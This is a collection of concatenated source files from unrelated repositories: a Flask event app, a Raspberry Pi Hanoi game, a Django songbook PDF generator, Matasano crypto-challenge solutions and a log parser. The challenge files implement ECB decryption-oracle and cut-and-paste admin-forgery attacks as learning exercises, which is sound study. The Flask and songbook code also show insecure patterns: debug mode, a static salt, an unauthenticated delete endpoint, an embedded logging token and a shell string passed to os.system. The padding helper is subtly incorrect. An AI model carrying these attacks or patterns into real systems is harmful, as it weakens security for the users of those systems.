- type of delimiter to be used, default value is ',' """ for key in d.keys(): d[key] = d.get(key).split(separator) return d def write_result_to_output_dir(path, filename, result): """ Writes the number of authors to a given file at a given location :param path: output directory path :param filename: output filename path :param result: number of authors :return: """ if not os.path.exists(path): os.makedirs(path) with open(path + filename, 'w') as f: json.dump({"authors": result}, f) ```
{ "source": "8thmatyr/evnt-web", "score": 2 }
#### File: app/conf/config-gunicorn.py ```python import os def numCPUs(): if not hasattr(os, 'sysconf'): raise RuntimeError('No sysconf detected.') return os.sysconf('SC_NPROCESSORS_ONLN') bind = '0.0.0.0:8001' workers = 4 # backlog = 2048 # worker_class = 'sync' worker_class = 'gevent' debug = True daemon = True pidfile = '/tmp/gunicorn.pid' logfile = '/tmp/gunicorn.log' # gunicorn -c config-gunicorn.py views:app ``` #### File: evnt-web/app/__init__.py ```python __version__ = '0.1.0' from flask import Flask from flask import session, g from flask import (render_template, url_for) from flask import redirect, make_response, Flask from flask import jsonify from flask import abort, request from json import dumps from functools import wraps import os import logging import hashlib import uuid from random import randint app = Flask('app') app.debug = True import os import rethinkdb as r from rethinkdb import * import psycopg2 import logging logging.basicConfig(filename='TaskWangu.log', level=logging.DEBUG) salt = '<PASSWORD>' RDB_HOST = os.environ.get('RDB_HOST') or '127.0.0.1' RDB_PORT = os.environ.get('RDB_PORT') or 28015 LINK_DB = 'LinkUs' import requests import simplejson # conn_string = "host='172.16.17.32' dbname='LinkUs' user='synod' password='<PASSWORD>**//'" # conn = psycopg2.connect(conn_string) # cursor = conn.cursor() ONLINE_LAST_MINUTES = 5 app.config[ONLINE_LAST_MINUTES] = 720 app.secret = 'I\<KEY>' def dbSetup(): connection = r.connect(host=RDB_HOST, port=RDB_PORT) try: r.db_create(LINK_DB).run(connection) r.db(LINK_DB).table_create('User').run(connection) logging.info('Database setup completed') except RqlRuntimeError: logging.info('App database already exists') finally: connection.close() def login_required(f): @wraps(f) def decorated_function(*args, **kwargs): if session[username] is None: return redirect(url_for('index', next=request.url)) return f(*args, **kwargs) return decorated_function """ @app.before_request def log_request(): log_data = "LOG_INFO=" + simplejson.dumps( { 'Request':'app.before', }) requests.post("https://logs-01.loggly.com/inputs/e15fde1a-fd3e-4076-a3cf-68bd9c30baf3/tag/python/", log_data) """ @app.before_request def before_request(): try: logging.info('before_request') g.rdb_conn = r.connect(host=RDB_HOST, port=RDB_PORT, db=LINK_DB) except RqlDriverError: abort(503, "No database connection could be established") @app.teardown_request def teardown_request(exception): try: logging.info('teardown_request') g.rdb_conn.close() except AttributeError: pass from userOps import * from taskOps import * ``` #### File: app/userOps/profile_admin.py ```python from app import app from app import r from app import g from app import logging from app import salt from app import RqlError from flask import (render_template, json) from flask import redirect, make_response from flask import Response, jsonify from flask import abort, request from flask import session from datetime import timedelta from json import dumps import os import logging import hashlib from random import randint import time from datetime import datetime @app.route('/profile/<username>/', methods=['POST', 'GET']) def profile(username): if request.method == 'POST': if not request.json: abort(400) if request.headers['Content-Type'] != 'application/json': abort(400) password = <PASSWORD>('password') smsdata = request.json.get('smsdata') email = request.json.get('email') dob = request.json.get('dob') username = request.json.get('username') state = request.json.get('state') mobileNo = request.json.get('mobileNo') if mobileNo.startswith('0'): mobileNo = mobileNo[1:] if mobileNo.startswith('+254'): mobileNo = mobileNo[4:] try: user = r.table( 'UsersInfo').get(str(username)).update({"email": email, "smscode": smsdata, "state": state, "dob": dob, "mobileNo": mobileNo}).run(g.rdb_conn) resp = make_response(jsonify({"OK": "User Updated"}), 202) resp.headers['Content-Type'] = "application/json" resp.cache_control.no_cache = True return resp except RqlError: logging.warning( 'DB code verify failed on /profile/api/' + username) resp = make_response(jsonify({"Error": "503 DB error"}), 503) resp.headers['Content-Type'] = "application/json" resp.cache_control.no_cache = True return resp try: user = r.table('UsersInfo').get(str(username)).run(g.rdb_conn) name = str(user['username']) state = str(user['state']) smscode = str(user['smscode']) password = str(user['password']) email = str(user['email']) mobileNo = str(user['mobileNo']) except RqlError: logging.warning('DB code verify failed on /profile/' + mobileNo) resp = make_response(jsonify({"Error": "503 DB error"}), 503) resp.headers['Content-Type'] = "application/json" resp.cache_control.no_cache = True return resp return render_template( 'profile.html', name=name, email=email, smscode=smscode, state=state, username=username, mobileNo=mobileNo) @app.route('/api/removeUser/', methods=['POST']) def removeUser(): if not request.json: abort(400) if request.headers['Content-Type'] != 'application/json': abort(400) password = request.json.<PASSWORD>('password') username = request.json.get('username') try: r.table('UsersInfo').get(username).delete().run(g.rdb_conn) except RqlError: logging.warning('DB remove user failed on /api/removeUser') resp = make_response(jsonify({'OK': 'Content Removed'}), 202) resp.headers['Content-Type'] = "application/json" resp.cache_control.no_cache = True return resp @app.route('/api/UserInfo/', methods=['POST']) def addUser(): if not request.json: abort(400) if request.headers['Content-Type'] != 'application/json': abort(400) # get JSON engine params fname = request.json.get('fname') lname = request.json.get('lname') username = request.json.get('username') mobileNo = request.json.get('mobileNo') state = request.json.get('state') location = request.json.get('location') email = request.json.get('email') if mobileNo.startswith('0'): mobileNo = mobileNo[1:] if mobileNo.startswith('+254'): mobileNo = mobileNo[4:] try: r.table('UsersInfo').insert({ 'fname': fname, 'lname': lname, 'mobileNo': mobileNo, 'email': email, 'state': state, 'userVerified': 'False', 'location': location }).run(g.rdb_conn) except RqlError: logging.warning('DB could not write on /api/adduser') resp = make_response(jsonify({"OK": "Content Saved"}), 202) resp.headers['Content-Type'] = "application/json" resp.cache_control.no_cache = True return resp @app.route('/reset/', methods=['POST', 'GET']) def forgotPassword(): if request.method == 'POST': if not request.json: abort(400) if request.headers['Content-Type'] != 'application/json': abort(400) email = request.json.get('email') try: user = r.table('UsersInfo').filter( {"email": email}).limit(1).pluck('username').run(g.rdb_conn) if user is None: resp = make_response(jsonify({'Missing': 'Not Found'}), 400) resp.headers['Content-Type'] = "application/json" resp.cache_control.no_cache = True return resp new_password = <PASSWORD>(<PASSWORD>, 9<PASSWORD>) new_password = str(<PASSWORD>) hashed_password = hashlib.sha512(new_password + salt).hexdigest() data = [] for el in user: data.append(el) username = data[0]['username'] r.table('UsersInfo').get( username).update({"password": <PASSWORD>}).run(g.rdb_conn) # sendMail.passwordReset(email, new_password) except RqlError: logging.warning('DB pass reset failed on /reset/') resp = make_response(jsonify({'OK': 'Email Sent'}), 200) resp.headers['Content-Type'] = "application/json" resp.cache_control.no_cache = True return resp return render_template('forgot-pass.html') ```
{ "source": "8ToThePowerOfMol/arduino-raspberry-puzzles", "score": 2 }
#### File: arduino-raspberry-puzzles/hanoi_puzzle/hanoi.py ```python import RPi.GPIO as GPIO import time GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) ## GPIO Setting: ## leds: ## 2 17 14 10 ## 3 27 15 9 ## 4 22 18 11 ## ## buttons: ## 25 ## 8 ## 7 ## 23 (reset) ## 24 (buzzer) GPIO.setup(2, GPIO.OUT) GPIO.setup(3, GPIO.OUT) GPIO.setup(4, GPIO.OUT) GPIO.setup(17, GPIO.OUT) GPIO.setup(27, GPIO.OUT) GPIO.setup(22, GPIO.OUT) GPIO.setup(14, GPIO.OUT) GPIO.setup(15, GPIO.OUT) GPIO.setup(18, GPIO.OUT) GPIO.setup(10, GPIO.OUT) GPIO.setup(9, GPIO.OUT) GPIO.setup(11, GPIO.OUT) GPIO.setup(7, GPIO.IN) GPIO.setup(8, GPIO.IN) GPIO.setup(25, GPIO.IN) GPIO.setup(23, GPIO.IN) GPIO.setup(24, GPIO.OUT) GPIO.output(4, GPIO.LOW) GPIO.output(22, GPIO.LOW) GPIO.output(18, GPIO.LOW) GPIO.output(11, GPIO.LOW) GPIO.output(3, GPIO.LOW) GPIO.output(27, GPIO.LOW) GPIO.output(15, GPIO.LOW) GPIO.output(9, GPIO.LOW) GPIO.output(2, GPIO.LOW) GPIO.output(17, GPIO.LOW) GPIO.output(14, GPIO.LOW) GPIO.output(10, GPIO.LOW) GPIO.output(4, GPIO.HIGH) GPIO.output(22, GPIO.HIGH) GPIO.output(18, GPIO.HIGH) GPIO.output(11, GPIO.HIGH) GPIO.output(24, GPIO.LOW) a = [0,0,0,0] b = [0,0,0,0] c = [1,1,1,1] # x={a[0]: 2, a[1]: 17, a[2]: 14, a[3]: 10, b[0]: 3, b[1]: 27, b[2]: 15, b[3]: 9, c[0]: 4, c[1]: 22, c[2]: 18, c[3]: 11} def swap(A, B): try: i = A.index(1) except ValueError: i = 4 try: j = B.index(1) except ValueError: j = 4 if i <= j: A[i], B[i] = B[i], A[i] return i else: print("Cannot swap!") return -1 def get_pin(tower, i): if tower == 1: if i == 0: return 2 elif i == 1: return 17 elif i == 2: return 14 elif i == 3: return 10 else: print("Pin error!") return -1 elif tower == 2: if i == 0: return 3 elif i == 1: return 27 elif i == 2: return 15 elif i == 3: return 9 else: print("Pin error!") return -1 elif tower == 3: if i == 0: return 4 elif i == 1: return 22 elif i == 2: return 18 elif i == 3: return 11 else: print("Pin error!") return -1 else: print("Pin error!") return -1 def reset(): GPIO.output(4, GPIO.LOW) GPIO.output(22, GPIO.LOW) GPIO.output(18, GPIO.LOW) GPIO.output(11, GPIO.LOW) GPIO.output(3, GPIO.LOW) GPIO.output(27, GPIO.LOW) GPIO.output(15, GPIO.LOW) GPIO.output(9, GPIO.LOW) GPIO.output(2, GPIO.LOW) GPIO.output(17, GPIO.LOW) GPIO.output(14, GPIO.LOW) GPIO.output(10, GPIO.LOW) time.sleep(2) GPIO.output(4, GPIO.HIGH) GPIO.output(22, GPIO.HIGH) GPIO.output(18, GPIO.HIGH) GPIO.output(11, GPIO.HIGH) time.sleep(.5) GPIO.output(4, GPIO.LOW) GPIO.output(22, GPIO.LOW) GPIO.output(18, GPIO.LOW) GPIO.output(11, GPIO.LOW) time.sleep(.5) GPIO.output(3, GPIO.HIGH) GPIO.output(27, GPIO.HIGH) GPIO.output(15, GPIO.HIGH) GPIO.output(9, GPIO.HIGH) time.sleep(.5) GPIO.output(3, GPIO.LOW) GPIO.output(27, GPIO.LOW) GPIO.output(15, GPIO.LOW) GPIO.output(9, GPIO.LOW) time.sleep(.5) GPIO.output(2, GPIO.HIGH) GPIO.output(17, GPIO.HIGH) GPIO.output(14, GPIO.HIGH) GPIO.output(10, GPIO.HIGH) time.sleep(.5) GPIO.output(2, GPIO.LOW) GPIO.output(17, GPIO.LOW) GPIO.output(14, GPIO.LOW) GPIO.output(10, GPIO.LOW) time.sleep(.5) GPIO.output(4, GPIO.HIGH) GPIO.output(22, GPIO.HIGH) GPIO.output(18, GPIO.HIGH) GPIO.output(11, GPIO.HIGH) print("Reset done!") def beep(): GPIO.output(24, GPIO.HIGH) time.sleep(.03) GPIO.output(24, GPIO.LOW) is_any_button_pressed = False while a != [1,1,1,1]: while(GPIO.input(25) == False) or (GPIO.input(8) == False) or (GPIO.input(7) == False) or (GPIO.input(23) == False): time.sleep(.3) print(a, b, c, sep='\n') is_any_button_pressed = False while 1: if not is_any_button_pressed: if(GPIO.input(25) == False): source = int(1) is_any_button_pressed = True print("source =", source) beep() break elif(GPIO.input(8) == False): source = int(2) is_any_button_pressed = True print("source =", source) beep() break elif(GPIO.input(7) == False): source = int(3) is_any_button_pressed = True print("source =", source) beep() break elif(GPIO.input(23) == False): source = int(0) is_any_button_pressed = True print("source =", source) beep() break else: pass while(GPIO.input(25) == False) or (GPIO.input(8) == False) or (GPIO.input(7) == False) or (GPIO.input(23) == False): time.sleep(.3) is_any_button_pressed = 0 while 1: if is_any_button_pressed == 0: if(GPIO.input(25) == False): dest = int(1) is_any_button_pressed = 1 print("dest =", dest) beep() break elif(GPIO.input(8) == False): dest = int(2) is_any_button_pressed = 1 print("dest =", dest) beep() break elif(GPIO.input(7) == False): dest = int(3) is_any_button_pressed = 1 print("dest =", dest) beep() break elif(GPIO.input(23) == False): dest = int(0) is_any_button_pressed = 1 print("dest =", dest) beep() break else: pass if source == 0 or dest == 0: reset() a = [0,0,0,0] b = [0,0,0,0] c = [1,1,1,1] i = -1 beep() # switch for all posibilities swapping inside array: elif source == 1 and dest == 2: i = swap(a, b) elif source == 1 and dest == 3: i = swap(a, c) elif source == 2 and dest == 1: i = swap(b, a) elif source == 2 and dest == 3: i = swap(b, c) elif source == 3 and dest == 1: i = swap(c, a) elif source == 3 and dest == 2: i = swap(c, b) else: print("Cannot swap!") i = -1 if i != -1: zhas = get_pin(source, i) rozs = get_pin(dest, i) GPIO.output(zhas, GPIO.LOW) GPIO.output(rozs, GPIO.HIGH) else: print("Pin is not searching!") print("YOU WON!") GPIO.output(24, GPIO.HIGH) for k in range(10): beep() time.sleep(.1) GPIO.cleanup() ```
{ "source": "8ToThePowerOfMol/dvojkarsky_zpevnik_web", "score": 3 }
#### File: dvojkarsky_zpevnik/homepage/utils.py ```python import os import re import shutil def get_songs_in_songbook_old(): songbook_name = os.path.join("..", "..", "DvojkarskyZpevnik", "Cely_zpevnik", "Zpevnik.tex") if os.path.isfile(songbook_name): with open(songbook_name, "r", encoding="UTF-8") as f: content = list(filter(lambda x: re.search("\\\importsong\{.*\}\{.*\}", x), f.readlines())) return {x.split("{")[1].split("}")[0]: x.split("{")[2].split("}")[0] for x in content} return {} def _cleanlatex(raw): cleantext = re.sub(re.compile("\\\[^\^\& ]*"), '', raw) cleantext = re.sub(re.compile("%%.*"), '', cleantext) cleantext = cleantext.replace(" }", " ") return cleantext def get_songname_from_texfile(file): with open(file, "r") as f: for line in f.readlines(): if "title=" in line: content = line break songname = _cleanlatex(content.split("\\\\")[0]) songauthor = _cleanlatex(content.split("\\\\")[1]) if "\\\\" in content else "" ret = "{} ({})".format(songname, songauthor) ret = re.sub(re.compile("\(\s*"), "(", ret) ret = re.sub(re.compile("\s*\)"), ")", ret) ret = ret.replace(" ()", "") ret = re.sub(re.compile("\s*$"), "", ret) return ret def get_songs_in_songbook(): songs_dir = os.path.join("..", "..", "DvojkarskyZpevnik", "songy") songs = os.listdir(songs_dir) songs = list(filter(lambda x: not x.startswith("0") and not x.startswith("ZZ") and x.endswith(".tex"), songs)) songs.sort() return {get_songname_from_texfile(os.path.join(songs_dir, x)): x for x in songs} def _clean_songs(songs_id, tex_path): for f in list(filter(lambda x: songs_id in x, os.listdir(tex_path))): os.remove(os.path.join(tex_path, f)) def produce_songs_pdf(songs_dict): files_to_typeset = [x for (x, y) in filter(lambda x: x[1], songs_dict)] tex_dir = os.path.join("..", "..", "DvojkarskyZpevnik", "web") # Lazy loading -- if we made given songlist before, just return its pdf songs_id = str(hash(str(files_to_typeset))) result_path = os.path.join(tex_dir, "pdfs", songs_id + ".pdf") if songs_id + ".pdf" in os.listdir(os.path.join(tex_dir, "pdfs")): return result_path, None # Prepare .tex file with songs songsfile = os.path.join(tex_dir, songs_id + "songs.tex") with open(songsfile, "w", encoding="UTF-8") as f: for x in files_to_typeset: f.write("\\input{../songy/" + x + "}\\newpage\n") # Copy generator file with linking to songfile genfile = os.path.join(tex_dir, songs_id + ".tex") with open(os.path.join(tex_dir, "generator.tex"), "r") as f: content = f.readlines() content[186] = "\\input{" + songs_id + "songs.tex}\n" with open(genfile, "w") as f: f.writelines(content) # Typeset song os.system("TEXINPUTS=.:{}/:{}/:$TEXINPUTS pdflatex -synctex=1 -interaction=batchmode -output-directory {}/ {}".format( os.path.abspath(tex_dir), os.path.join("..", "..", "DvojkarskyZpevnik"), tex_dir, genfile)) pdffile = os.path.join(tex_dir, songs_id + ".pdf") if not os.path.isfile(pdffile): logfile = os.path.join(tex_dir, songs_id + ".log") content = None if os.path.isfile(logfile): with open(os.path.join(logfile), "r") as f: content = f.readlines() _clean_songs(songs_id, tex_dir) return None, content shutil.copy2(pdffile, result_path) _clean_songs(songs_id, tex_dir) return result_path, None ``` #### File: dvojkarsky_zpevnik/homepage/views.py ```python import os from django.shortcuts import render from django.views.generic import TemplateView from .forms import SongsForm from .utils import produce_songs_pdf from django.http import HttpResponse, Http404 def download(request, path): if os.path.exists(path): with open(path, 'rb') as fh: response = HttpResponse(fh.read(), content_type="application/pdf") response['Content-Disposition'] = 'inline; filename=' + os.path.basename(path) return response raise Http404 # View part def home(request): return render(request, 'homepage/home.html') class DownloadView(TemplateView): template_name = 'homepage/download.html' def get(self, request, *args, **kwargs): form = SongsForm() return render(request, self.template_name, {"form": form}) def post(self, request): form = SongsForm(request.POST) if form.is_valid(): songpdf, log = produce_songs_pdf(form.checkboxes()) if songpdf is None: if log is None: return render(request, 'homepage/message.html', {"text": "Nejde přeložit pdfko :-("}) return render(request, 'homepage/message.html', {"text": log}) return download(request, songpdf) # return render(request, 'homepage/message.html', {"text": log}) return render(request, self.template_name, {"form": form}) ```
{ "source": "8u1a/my_matasano_crypto_challenges", "score": 3 }
#### File: my_matasano_crypto_challenges/set2/challenge12.py ```python __author__ = 'christianbuia' import random from Crypto.Cipher import AES import base64 def pkcs7_padding(message_bytes, block_size): pad_length = block_size - (len(message_bytes) % block_size) if pad_length != block_size: for i in range(0, pad_length): message_bytes += bytes([pad_length]) return message_bytes #----------------------------------------------------------------------------------------------------------------------- def generateRandom16bytes(): ints = [] for i in range(16): ints.append(random.randint(0,255)) return bytes(ints) #----------------------------------------------------------------------------------------------------------------------- #always 16 bytes def encrypt_aes128(message, key): decobj = AES.new(key, AES.MODE_ECB) return decobj.encrypt(pkcs7_padding(message, 16)) #----------------------------------------------------------------------------------------------------------------------- #attempt to detect ECB by looking for identical blocks def detectEBC(cipher, block_size): blocks = [] for i in range(int(len(cipher)/block_size)): blocks.append(cipher[i*block_size:i*block_size+block_size]) #detecting if dups exist: http://stackoverflow.com/questions/9835762/find-and-list-duplicates-in-python-list if (len(set([x for x in blocks if blocks.count(x) > 1]))) > 0: return True else: return False #----------------------------------------------------------------------------------------------------------------------- def ecb_oracle(mytext, plaintext): cipher = encrypt_aes128(mytext + plaintext, global_key) return cipher #----------------------------------------------------------------------------------------------------------------------- #detect block size by feeding the oracle a single byte to encrypt, and then inspecting the length of the cipher #this assumes a single byte will be represented by a single block of the cipher (pretty safe assumption methinks, #requires that the oracle won't prepend random bytes of size >= to the block size). def detect_oracle_block_size(oracle_func): cipher = oracle_func(bytes("A", "ascii"), bytes("", "ascii")) return len(cipher) #----------------------------------------------------------------------------------------------------------------------- #detect oracle is ecb by feeding the oracle with homogeneous plaintext with length equal to exactly 4x the block length, #then comparing the 2nd & 3rd cipher blocks. identical cipher blocks indicate the oracle generates ecb ciphers. #using blocks 2 & 3 in case of random prefixes (of size less than block size) prepended to the plaintext by the oracle def detect_oracle_is_ecb(oracle_func, block_size): ints = [ord("A") for x in range(block_size*4)] cipher = oracle_func(bytes(ints), bytes("", "ascii")) if cipher[block_size:block_size*2-1] == cipher[block_size*2:block_size*3-1]: return True else: return False #----------------------------------------------------------------------------------------------------------------------- def detect_plaintext_padding_size(oracle_func, plaintext, block_size): count = 0 mytext = b"" observed_blocks = None while True: cipher = oracle_func(mytext, plaintext) next_observed_blocks = len(cipher) / block_size if observed_blocks != None and observed_blocks < next_observed_blocks: break observed_blocks = next_observed_blocks mytext += bytes("A", "ascii") count += 1 return (count - 1) #----------------------------------------------------------------------------------------------------------------------- def crack_ecb(oracle_func, plaintext): #detect block size block_size = detect_oracle_block_size(oracle_func) #detect oracle is ECB if detect_oracle_is_ecb(oracle_func, block_size) is not True: print("oracle was determined to not be ECB. Exiting.") exit(1) #detect size of padding padding_size = detect_plaintext_padding_size(oracle_func, plaintext, block_size) size_of_unaltered_cipher = len(oracle_func(b"", plaintext)) number_of_blocks = int(size_of_unaltered_cipher / block_size) #the solved plain text we accumulate and return solved_plain_text = b"" for block_number in range(number_of_blocks): #generally we do a full block_size cycle of attack arrays... #unless it's the last block, in which case we subtract padding. if block_number == number_of_blocks - 1: iters = block_size - padding_size else: iters = block_size for byte_number in range(iters): #generate a homogeneous string of bytes that is of size block_size - 1 - (the number of solved bytes) ints = [ord("A") for i in range(block_size-1-byte_number)] attack_array = bytes(ints) just_short_array = attack_array + solved_plain_text last_byte_dict = {} #ordinal for all ascii (0-127) for i in range(0, 127+1): last_byte_dict[i] = oracle_func(just_short_array, bytes([i])) cipher = oracle_func(attack_array, plaintext) for i in last_byte_dict.__iter__(): if last_byte_dict[i] == cipher[:block_size*(block_number + 1)]: solved_plain_text += bytes([i]) return solved_plain_text #*********************************************************************************************************************** global global_key global_key = generateRandom16bytes() b64_unknown_string = """<KEY>""".replace("\n", "") #prep the plaintext, though we don't want to know what it is yet #(we are going to use the oracle to crack encrypted versions of the plaintext) unknown_string = base64.b64decode(b64_unknown_string) plaintext = bytes(unknown_string) print(crack_ecb(ecb_oracle, plaintext)) ``` #### File: my_matasano_crypto_challenges/set2/challenge13.py ```python __author__ = 'christianbuia' import random from Crypto.Cipher import AES def pkcs7_padding(message_bytes, block_size): pad_length = block_size - (len(message_bytes) % block_size) if pad_length != block_size: for i in range(0, pad_length): message_bytes += bytes([pad_length]) return message_bytes #----------------------------------------------------------------------------------------------------------------------- def generateRandom16bytes(): ints = [] for i in range(16): ints.append(random.randint(0,255)) return bytes(ints) #----------------------------------------------------------------------------------------------------------------------- #always 16 bytes def encrypt_aes128(message, key): decobj = AES.new(key, AES.MODE_ECB) return decobj.encrypt(pkcs7_padding(message, 16)) #----------------------------------------------------------------------------------------------------------------------- #always 16 bytes def decrypt_aes128(message, key): decobj = AES.new(key, AES.MODE_ECB) return strip_pkcs7_padding(decobj.decrypt(message), 16) #----------------------------------------------------------------------------------------------------------------------- def strip_pkcs7_padding(message, blocksize): number_of_blocks = len(message) / blocksize for i in range(1,blocksize): clean = True for j in range(i): if message[int(blocksize*(number_of_blocks-1) + (blocksize - 1 - j))] != i: clean=False if clean == True: return message[:-i] return message #----------------------------------------------------------------------------------------------------------------------- def parseKV(message): kv_dict = {} pairs = message.split("&") for p in pairs: items = p.split("=") kv_dict[items[0]] = items[1] return kv_dict #----------------------------------------------------------------------------------------------------------------------- def profile_for(email_address, uid=10, role='user'): if "@" not in email_address: print("not a valid email...quitting.") exit(1) email_address = email_address.replace("&", "").replace("=", "") return "email=" + email_address + "&uid=" + str(uid) + "&role=" + role #----------------------------------------------------------------------------------------------------------------------- def profile_for_encrypted(email_address, key, uid=10, role='user'): return encrypt_aes128(bytes(profile_for(email_address, uid, role), "ascii"), key) #----------------------------------------------------------------------------------------------------------------------- #*********************************************************************************************************************** ckey = generateRandom16bytes() #the admin block we want looks like this: #admin\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b #and we can snag that by making this the beginning of our email address, e.g.: #AAAAAAAAAAadmin\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\[email protected] #and grabbing the second block (since the first block will be "email=AAAAAAAAAA") #and then this can be appended to a message that is an exact multiple of block size, e.g.: #email=<EMAIL>&uid=10&role= #grab the second block of our special message, which is the admin block admin_block = profile_for_encrypted("AAAAAAAAAAadmin\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\[email protected]", ckey)[16:32] #get the target message we want to tamper with: cipher_target = profile_for_encrypted("<EMAIL>", ckey) #splice cipher_tampered = cipher_target[:len(cipher_target)-16] + admin_block #test print(decrypt_aes128(cipher_tampered, ckey).decode("ascii")) ``` #### File: my_matasano_crypto_challenges/set2/challenge9.py ```python __author__ = 'christianbuia' def pkcs7_padding(message_bytes, block_size): pad_length = block_size - (len(message_bytes) % block_size) if pad_length != block_size: for i in range(0, pad_length): message_bytes.append(pad_length) return message_bytes #======================================================================================================================= print(pkcs7_padding(bytearray("YELLOW SUBMARINE", "utf-8"), 20)) print(pkcs7_padding(bytearray("YELLOW SUBMARINE", "utf-8"), 21)) print(pkcs7_padding(bytearray("WE ALL LIVE IN A YELLOW SUBMARINE", "utf-8"), 20)) print(pkcs7_padding(bytearray("WE ALL LIVE IN A YEL", "utf-8"), 20)) ```
{ "source": "8vana/8vana", "score": 3 }
#### File: 1vana/modules/imageloader.py ```python from PIL import Image class ImageLoader: debug = 0 rgb_color = { "black": (0, 0, 0), "darkblue": (29, 43, 83), "darkpurple": (126, 37, 83), "darkgreen": (0, 135, 81), "brown": (171, 82, 54), "darkgray": (95, 87, 79), "lightgray": (194, 195, 199), "white": (255, 241, 232), "red": (255, 0, 77), "orange": (255, 163, 0), "yellow": (255, 236, 39), "green": (0, 228, 54), "blue": (41, 173, 255), "indigo": (131, 118, 156), "pink": (255, 119, 168), "peach": (255, 204, 170) } color = { "black": 0, "darkblue": 1, "darkpurple": 2, "darkgreen": 3, "brown": 4, "darkgray": 5, "lightgray": 6, "white": 7, "red": 8, "orange": 9, "yellow": 10, "green": 11, "blue": 12, "indigo": 13, "pink": 14, "peach": 15 } def __init__(self, infile): self.infile = infile self.width = 0 self.height = 0 self.map = [] def judge(self, rgb): """ rgbの配列からpyxelの色番号を特定する """ result = 16 for k in (ImageLoader.rgb_color): if (ImageLoader.rgb_color[k] == rgb): result = ImageLoader.color[k] break return result def getpix(self, img): width, height = img.size pixels = [] for y in range(height): for x in range(width): rgb = img.getpixel((x, y)) pixels.append(self.judge(rgb)) return pixels def show(self, pixmap, width=32): i = 0 for p in (pixmap): if i % width == 0: print("") print("%2d" % (p), end="") i += 1 def get_size(self): return [self.width, self.height] def get_pixelmap(self): """ pyxelのカラーインデックスのマップを返す """ img = Image.open(self.infile) width, height = img.size self.width = width self.height = height if img.mode != "RGB": img = img.convert("RGB") pixmap = self.getpix(img) self.map = pixmap return self.map ``` #### File: 8vana/common/Ultimate_Log_parser.py ```python import os import sys import codecs import json import re import time import configparser from datetime import datetime # Type of printing. OK = 'ok' # [*] NOTE = 'note' # [+] FAIL = 'fail' # [-] WARNING = 'warn' # [!] NONE = 'none' # No label. # Paerser class. class Parser: def __init__(self): self.file_name = os.path.basename(__file__) self.full_path = os.path.dirname(os.path.abspath(__file__)) self.root_path = os.path.join(self.full_path, '..') # Read config.ini. config = configparser.ConfigParser() config.read(os.path.join(self.full_path, 'config.ini'), encoding='utf-8') try: self.date_format = config['Common']['date_format'] self.default_charset = config['Common']['default_charset'] self.watch_period = int(config['Common']['watch_period']) if self.watch_period < 5: print('Watching period is too short. >= 5[s]') self.watch_period = 5 origin_log_dir = os.path.join(self.root_path, config['LogParser']['origin_log_path']) self.origin_log_path = os.path.join(origin_log_dir, config['LogParser']['origin_log_file']) converted_log_dir = os.path.join(self.root_path, config['LogParser']['converted_log_path']) self.converted_log_path = os.path.join(converted_log_dir, config['LogParser']['converted_log_file']) self.divide_regex = config['LogParser']['divide_regex'] self.date_regex = config['LogParser']['date_regex'] self.phase_regex = config['LogParser']['phase_regex'] self.action_regex = config['LogParser']['action_regex'] self.note_regex = config['LogParser']['note_regex'] self.from_regex = config['LogParser']['from_regex'] self.to_regex = config['LogParser']['to_regex'] self.fire_regex_list = config['LogParser']['fire_regex'].split('@') except Exception as e: print('Reading config.ini is failure : {}'.format(e)) sys.exit(1) # Add log to JSON file. def append_json_to_file(self, data): with codecs.open(self.converted_log_path, mode='a', encoding=self.default_charset) as fout: fout.seek(0, 2) if fout.tell() == 0: fout.write(json.dumps([data], indent=4)) else: fout.seek(-1, 2) fout.truncate() fout.write(' , ') fout.write(json.dumps(data, indent=4)) fout.write(']') print('Wrote logs: {}'.format(data)) # Parse log. def parse_log(self, contents): # Extract response time from log. all_logs = re.split(self.divide_regex, contents) with codecs.open(self.converted_log_path, mode='a', encoding='utf-8') as fout: parsed_logs = [] for log in all_logs: fire_flag = False phase = re.findall(self.phase_regex, log) attack = re.findall(self.action_regex, log) date = re.findall(self.date_regex, log) src = re.findall(self.from_regex, log) dest = re.findall(self.to_regex, log) note = re.findall(self.note_regex, log) if len(date) != 0 and len(phase) != 0 and len(attack) != 0 and len(note) != 0 and len(src) != 0 and len(dest) != 0: if note[0] != '': for fire_regex in self.fire_regex_list: result = re.findall(fire_regex, note[0]) if len(result) != 0: fire_flag = True break date_epoc = datetime.strptime(date[0], self.date_format).timestamp() log_content = {'phase': phase[0], 'attack': attack[0], 'time': date_epoc, 'from': src[0], 'to': dest[0], 'note': {'option': note[0], 'CVE': fire_flag}} self.append_json_to_file(log_content) return parsed_logs # Monitor log files. def watch(self, read_start_byte): # Check updated date of target log. if os.path.exists(self.origin_log_path): # Read log. with codecs.open(self.origin_log_path, mode='r', encoding='utf-8') as fin: fin.seek(read_start_byte) content = fin.read() return content else: return '' # main. if __name__ == '__main__': file_name = os.path.basename(__file__) full_path = os.path.dirname(os.path.abspath(__file__)) # Create instance. parser = Parser() # Watching loop. read_start_byte = 0 while True: log_contents = parser.watch(read_start_byte) if len(log_contents) != 0: read_start_byte += len(log_contents) parsed_log_list = parser.parse_log(log_contents) # Wait. print('waiting.. {}[s]'.format(parser.watch_period)) time.sleep(parser.watch_period) ```
{ "source": "8-vishal/Covid-19_Visualizer", "score": 3 }
